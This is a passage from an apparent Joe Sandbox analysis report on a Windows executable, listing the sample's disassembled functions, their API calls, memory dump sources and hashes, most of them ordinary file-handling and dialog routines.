                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 27927d0b9cf2989c2535945012b09e98a1d63a1d86715cb390dd83c5460e6ecd
                                          • Instruction ID: a479b96bf35fe1c3b92d028b7808eac190779b7a7d9c28b3ad2fc6362bd2aef5
                                          • Opcode Fuzzy Hash: 27927d0b9cf2989c2535945012b09e98a1d63a1d86715cb390dd83c5460e6ecd
                                          • Instruction Fuzzy Hash: DFA011E22A8002BC3808A283AC02EBB030EC0C0B20330882EF80A80080AC80080038B3
                                          Function 00F9E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 9bdb70ea972b94cb8192e1c0ceb6497e95918f2324f9623f848b0a0707ead3df
                                          • Instruction ID: a479b96bf35fe1c3b92d028b7808eac190779b7a7d9c28b3ad2fc6362bd2aef5
                                          • Opcode Fuzzy Hash: 9bdb70ea972b94cb8192e1c0ceb6497e95918f2324f9623f848b0a0707ead3df
                                          • Instruction Fuzzy Hash: DFA011E22A8002BC3808A283AC02EBB030EC0C0B20330882EF80A80080AC80080038B3
                                          Function 00F9E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 6f4beb23b105e5e471e6a173f7785a3da43ea5b7cae9f75d1b33b332bf2daa43
                                          • Instruction ID: a479b96bf35fe1c3b92d028b7808eac190779b7a7d9c28b3ad2fc6362bd2aef5
                                          • Opcode Fuzzy Hash: 6f4beb23b105e5e471e6a173f7785a3da43ea5b7cae9f75d1b33b332bf2daa43
                                          • Instruction Fuzzy Hash: DFA011E22A8002BC3808A283AC02EBB030EC0C0B20330882EF80A80080AC80080038B3
                                          Function 00F9E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 9fe1d6ebccde10657df1e4e9a7d16d1e0871555c40a8c81f7c754eaf32220a5b
                                          • Instruction ID: ca19cb2360fd44f7601e2ae6b5db1290e4f268960b706d9e7ebb192e11de7a9a
                                          • Opcode Fuzzy Hash: 9fe1d6ebccde10657df1e4e9a7d16d1e0871555c40a8c81f7c754eaf32220a5b
                                          • Instruction Fuzzy Hash: A6A011C22A8002BC3808A2A22C02E3B020EC0C0B20332882EF80AC00C0BC82082038B2
                                          Function 00F9E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 0447b20e81a5a2da0f6300ec692eb8834f61dbaede19e8bf093ed4e1c6d9473d
                                          • Instruction ID: ca19cb2360fd44f7601e2ae6b5db1290e4f268960b706d9e7ebb192e11de7a9a
                                          • Opcode Fuzzy Hash: 0447b20e81a5a2da0f6300ec692eb8834f61dbaede19e8bf093ed4e1c6d9473d
                                          • Instruction Fuzzy Hash: A6A011C22A8002BC3808A2A22C02E3B020EC0C0B20332882EF80AC00C0BC82082038B2
                                          Function 00F9E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 7eb9ad84683769056456e1fc2cb7641afdbd15e531c6b0a9d41e1e455063b645
                                          • Instruction ID: f31a85d1e0d94c5f7d252281c35ba0345bad0e5ef53f65e322fd801aac49b1a9
                                          • Opcode Fuzzy Hash: 7eb9ad84683769056456e1fc2cb7641afdbd15e531c6b0a9d41e1e455063b645
                                          • Instruction Fuzzy Hash: 62A011C22A80003C3808A2A22C02E3B020EC0C0B22332822EF808C00C0BC82082038B2
                                          Function 00F9E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: a362cc51739fb4b9f01d1d8f7b46bc4944cd37adb9fa69eccdb510f3d25a69ca
                                          • Instruction ID: 853c716314292ec9e524657963f07166e5c82a8b4a691c192795fe58988330e7
                                          • Opcode Fuzzy Hash: a362cc51739fb4b9f01d1d8f7b46bc4944cd37adb9fa69eccdb510f3d25a69ca
                                          • Instruction Fuzzy Hash: 77A011C22A8002BC3808A2822C02EBB020EC0C2F20330882EF88AC0080BC808C003CB2
                                          Function 00F9E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: fd087ceaf6a4195f202ce07e1f1b73455f31536ddef2f6ffb095eac79da1a6d1
                                          • Instruction ID: 853c716314292ec9e524657963f07166e5c82a8b4a691c192795fe58988330e7
                                          • Opcode Fuzzy Hash: fd087ceaf6a4195f202ce07e1f1b73455f31536ddef2f6ffb095eac79da1a6d1
                                          • Instruction Fuzzy Hash: 77A011C22A8002BC3808A2822C02EBB020EC0C2F20330882EF88AC0080BC808C003CB2
                                          Function 00F9E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 849b24bdcfbb0f78f9a13358adf8020c115c1662bbd06d68610c1a21f9f34ed3
                                          • Instruction ID: 853c716314292ec9e524657963f07166e5c82a8b4a691c192795fe58988330e7
                                          • Opcode Fuzzy Hash: 849b24bdcfbb0f78f9a13358adf8020c115c1662bbd06d68610c1a21f9f34ed3
                                          • Instruction Fuzzy Hash: 77A011C22A8002BC3808A2822C02EBB020EC0C2F20330882EF88AC0080BC808C003CB2
                                          Function 00F9E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 44dafd21983a469fb587d50da23c6ef766c666b9f896d74558f9f51ff78b5073
                                          • Instruction ID: 853c716314292ec9e524657963f07166e5c82a8b4a691c192795fe58988330e7
                                          • Opcode Fuzzy Hash: 44dafd21983a469fb587d50da23c6ef766c666b9f896d74558f9f51ff78b5073
                                          • Instruction Fuzzy Hash: 77A011C22A8002BC3808A2822C02EBB020EC0C2F20330882EF88AC0080BC808C003CB2
                                          Function 00F89F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetEndOfFile.KERNEL32(?,00F8903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00F89F0C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File
                                          • String ID:
                                          • API String ID: 749574446-0
                                          • Opcode ID: da963e95cdb0fba5f13ea6fefc2cbf230f799be302fc99643cbc2ff404f782d7
                                          • Instruction ID: 497fe4ecc77799af12dff631e63b8bf43ae6e6cbcd3858ab0406bb92a4bb587f
                                          • Opcode Fuzzy Hash: da963e95cdb0fba5f13ea6fefc2cbf230f799be302fc99643cbc2ff404f782d7
                                          • Instruction Fuzzy Hash: 9EA0113008000E8A8E002B30CA8800C3B20EB20BC830202A8A00ACA0A2CB22880BAA00
                                          Function 00F9AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetCurrentDirectoryW.KERNEL32(?,00F9AE72,C:\Users\user\Desktop,00000000,00FC946A,00000006), ref: 00F9AC08
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory
                                          • String ID:
                                          • API String ID: 1611563598-0
                                          • Opcode ID: 77ace84163e804a3e89cba980c18851f54e7728aaf270bac681a4c696828221d
                                          • Instruction ID: 57831b432d306fed1f4eb02cce81d287dab9b34f2e129967ca37427a4a394a34
                                          • Opcode Fuzzy Hash: 77ace84163e804a3e89cba980c18851f54e7728aaf270bac681a4c696828221d
                                          • Instruction Fuzzy Hash: 9FA01130200200AB83000B328F8AA0EBAAAAFA2B00F00C028A00080030CB30C820BA00
                                          Function 00F89620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(000000FF,?,?,00F895D6,?,?,?,?,?,00FB2641,000000FF), ref: 00F8963B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: e54e0205218a2af39672fd2192e590da1dfd6941e5e1bc998d047f65fe37be54
                                          • Instruction ID: 34ed233b8d3693ea6d6492ad0dc6edbbafbb0350e84269a104fa7444b27f806d
                                          • Opcode Fuzzy Hash: e54e0205218a2af39672fd2192e590da1dfd6941e5e1bc998d047f65fe37be54
                                          • Instruction Fuzzy Hash: 3FF08970889B159FDB31AA24C458BE277E86B12335F081B1ED0F6429E0E7B1658DAB40

                                          Non-executed Functions

                                          Function 00F9C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F9C2B1
                                          • EndDialog.USER32(?,00000006), ref: 00F9C2C4
                                          • GetDlgItem.USER32(?,0000006C), ref: 00F9C2E0
                                          • SetFocus.USER32(00000000), ref: 00F9C2E7
                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 00F9C321
                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F9C358
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00F9C36E
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F9C38C
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F9C39C
                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F9C3B8
                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F9C3D4
                                          • _swprintf.LIBCMT ref: 00F9C404
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F9C417
                                          • FindClose.KERNEL32(00000000), ref: 00F9C41E
                                          • _swprintf.LIBCMT ref: 00F9C477
                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 00F9C48A
                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F9C4A7
                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F9C4C7
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F9C4D7
                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F9C4F1
                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F9C509
                                          • _swprintf.LIBCMT ref: 00F9C535
                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F9C548
                                          • _swprintf.LIBCMT ref: 00F9C59C
                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 00F9C5AF
                                            • Part of subcall function 00F9AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F9AF35
                                            • Part of subcall function 00F9AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00FBE72C,?,?,?,?,?,00000032), ref: 00F9AF84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                          • API String ID: 797121971-1840816070
                                          • Opcode ID: 31fbe40a45a830a547246fb601f63f98abc3b1f553e2980d80c45282f8c02313
                                          • Instruction ID: ee86ebd0e7af7c3245bfbab887a674b643d7dc37c2c28f3af4555677430f1657
                                          • Opcode Fuzzy Hash: 31fbe40a45a830a547246fb601f63f98abc3b1f553e2980d80c45282f8c02313
                                          • Instruction Fuzzy Hash: EA919472548348BBE721EBA4CC8DFFB77ACEB49B04F044819F745D6081D775A604AB62
                                          Function 00F86FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F86FAA
                                          • _wcslen.LIBCMT ref: 00F87013
                                          • _wcslen.LIBCMT ref: 00F87084
                                            • Part of subcall function 00F87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F87AAB
                                            • Part of subcall function 00F87A9C: GetLastError.KERNEL32 ref: 00F87AF1
                                            • Part of subcall function 00F87A9C: CloseHandle.KERNEL32(?), ref: 00F87B00
                                            • Part of subcall function 00F8A1E0: DeleteFileW.KERNEL32(000000FF,?,?,00F8977F,?,?,00F895CF,?,?,?,?,?,00FB2641,000000FF), ref: 00F8A1F1
                                            • Part of subcall function 00F8A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F8977F,?,?,00F895CF,?,?,?,?,?,00FB2641), ref: 00F8A21F
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00F87139
                                          • CloseHandle.KERNEL32(00000000), ref: 00F87155
                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F87298
